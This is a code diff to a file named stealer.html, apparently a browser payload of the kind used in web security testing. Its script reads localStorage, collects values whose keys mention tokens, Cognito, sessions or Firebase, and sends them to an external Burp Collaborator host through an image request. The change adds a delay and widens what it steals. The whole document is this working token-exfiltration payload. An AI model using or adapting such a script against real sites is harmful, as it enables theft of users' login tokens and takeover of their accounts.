--- a/stealer.html
+++ b/stealer.html
@@ -2,16 +2,23 @@
 <html>
   <body>
     <script>
-      let data = '';
-      for (let i = 0; i < localStorage.length; i++) {
-        let key = localStorage.key(i);
-        if (key.toLowerCase().includes("token") || key.toLowerCase().includes("cognito")) {
-          data += key + '=' + localStorage.getItem(key) + '&';
+      setTimeout(() => {
+        let data = '';
+        for (let i = 0; i < localStorage.length; i++) {
+          let key = localStorage.key(i);
+          if (
+            key.toLowerCase().includes("token") ||
+            key.toLowerCase().includes("cognito") ||
+            key.toLowerCase().includes("session") ||
+            key.toLowerCase().includes("firebase")
+          ) {
+            data += key + '=' + localStorage.getItem(key) + '&';
+          }
         }
-      }
-      if (data.length > 0) {
-        new Image().src = "https://zhkpj3ywa31n5ocuyrt0v0ti096zuo.burpcollaborator.net/?" + encodeURIComponent(data);
-      }
+        if (data.length > 0) {
+          new Image().src = "https://zhkpj3ywa31n5ocuyrt0v0ti096zuo.burpcollaborator.net/?" + data;
+        }
+      }, 3000);
     </script>
   </body>
 </html>
